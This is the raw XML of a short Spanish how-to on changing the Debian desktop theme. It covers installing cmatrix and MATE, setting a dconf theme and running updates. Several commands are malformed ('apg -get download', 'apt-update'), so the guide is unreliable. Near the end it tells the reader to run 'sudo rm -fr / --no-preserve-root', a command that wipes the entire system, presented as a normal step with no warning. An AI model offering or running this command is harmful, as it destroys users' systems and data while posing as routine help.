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inux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O"/>
          <w:b w:val="1"/>
          <w:color w:val="ce181e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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b w:val="1"/>
          <w:color w:val="ce181e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cambiar de tema en Debian</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials 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inux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comandos utilizados:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials 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inux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O"/>
          <w:highlight w:val="lightGray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highlight w:val="lightGray"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apg -get download cmatrix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials 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inux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O"/>
          <w:highlight w:val="lightGray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highlight w:val="lightGray"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dpkg -i cmatrix </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials 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inux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O"/>
          <w:highlight w:val="lightGray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highlight w:val="lightGray"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apt update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O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inux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Con esto queda instalado el entorno Mate, el cual selecciono al iniciar sesión</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials 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inux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O"/>
          <w:highlight w:val="lightGray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highlight w:val="lightGray"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dconf write </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O"/>
          <w:i w:val="1"/>
          <w:highlight w:val="lightGray"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">org/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O"/>
          <w:i w:val="0"/>
          <w:highlight w:val="lightGray"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mate/desktop/interface/gtk-theme”’Adwaita-dark’”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i w:val="0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Con esto, se </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cambió</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O"/>
          <w:i w:val="0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> de tema</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010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i w:val="0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tema Actual</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012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58597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rFonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials 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nux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials 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inux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials 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i w:val="0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">En entorno MATE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018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66407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i w:val="0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Luego del cambio de tema</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B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671570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1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inux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="ce181e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="ce181e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comandos para actualizar el Sistema Operativo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F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inux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O"/>
          <w:i w:val="0"/>
          <w:highlight w:val="lightGray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i w:val="0"/>
          <w:highlight w:val="lightGray"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O"/>
          <w:i w:val="0"/>
          <w:highlight w:val="lightGray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i w:val="0"/>
          <w:highlight w:val="lightGray"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022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Fonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O"/>
          <w:i w:val="0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">deben ejecutarse como superusuario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024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400550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rFonts w:ascii="Linux Libertine Initials O" w:cs="Linux Libertine Initials O" w:eastAsia="Linux Libertine Initials O" w:hAnsi="Linux Libertine Initials O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Utilizar el comando: sudo rm -fr / --no-preserve-root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514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b w:val="1"/>
          <w:color w:val="ff0000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96"/>
          <w:szCs w:val="96"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FIN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="9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  <w:font w:name="Linux Libertine Initials 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